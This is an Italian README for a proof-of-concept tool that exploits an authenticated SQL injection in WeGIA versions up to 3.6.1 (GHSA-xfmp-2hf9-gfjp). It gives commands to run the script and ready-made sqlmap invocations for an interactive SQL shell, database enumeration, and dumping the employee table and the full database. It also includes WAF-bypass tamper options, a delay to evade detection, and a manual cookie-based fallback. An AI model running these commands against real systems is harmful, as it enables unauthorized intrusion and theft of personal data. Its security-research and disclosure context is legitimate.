
Questo è uno script helper Python leggero progettato per automatizzare la generazione di file PoC compatibili con sqlmap per la vulnerabilità di SQL injection basata su errori autenticata in WeGIA (≤ 3.6.1), identificata come GHSA-xfmp-2hf9-gfjp.
SQL Injection Autenticata Basata su Errori in WeGIA ≤ 3.6.1
GHSA-xfmp-2hf9-gfjp | Avviso Ufficiale
Autore Originale del POC / Segnalatore: ViniCastro2001 GHSA Pubblicato da: nilsonLazarin (manutentore del progetto)
Questo script Python leggero automatizza:
id_memorando=1*)--sql-shell)requests (la maggior parte degli ambienti di penetration testing la possiede già)git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
cd CVE-2026-23723-POC
# Consigliato: prompt interattivo per la password
python CVE-2026-23723.py --url http://target.com -u admin
# Fornire la password direttamente
python CVE-2026-23723.py --url http://target.com -u admin -p wegia
# File di output personalizzato
python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req
Dopo l'esecuzione riuscita, lo script:
Tenterà il login Genererà wegia_sqlmap.req (o il tuo nome file personalizzato) Mostrerà i comandi sqlmap pronti all'uso
# 1. Shell interattiva simile a MySQL (maggiormente consigliata)
sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb
# 2. Mostra il database corrente e tutti i database
sqlmap -r wegia_sqlmap.req --current-db --dbs --batch
# 3. Elenca le tabelle nel database wegia
sqlmap -r wegia_sqlmap.req -D wegia --tables --batch
# 4. Dump di una tabella specifica (esempio: funcionario)
sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch
# 5. Dump dell'intero database wegia (attenzione!)
sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
Flag sqlmap opzionali:
--proxy=http://127.0.0.1:8080 (attraverso Burp/ZAP)
--tamper=space2comment,randomcase (bypass WAF di base)
--delay=1 (rallenta per evitare il rilevamento)
Se il Login Automatico Fallisce Accedi manualmente tramite browser → copia l'intero header Cookie → esegui sqlmap direttamente:
sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
--cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
--sql-shell --batch
Disclaimer Legale Questo PoC è fornito esclusivamente per scopi educativi e di penetration testing autorizzato. L'uso non autorizzato contro qualsiasi sistema è illegale e proibito. L'autore e i collaboratori non si assumono alcuna responsabilità per un uso improprio o per qualsiasi danno causato. Riferimenti
GHSA-xfmp-2hf9-gfjp CVE-2026-23723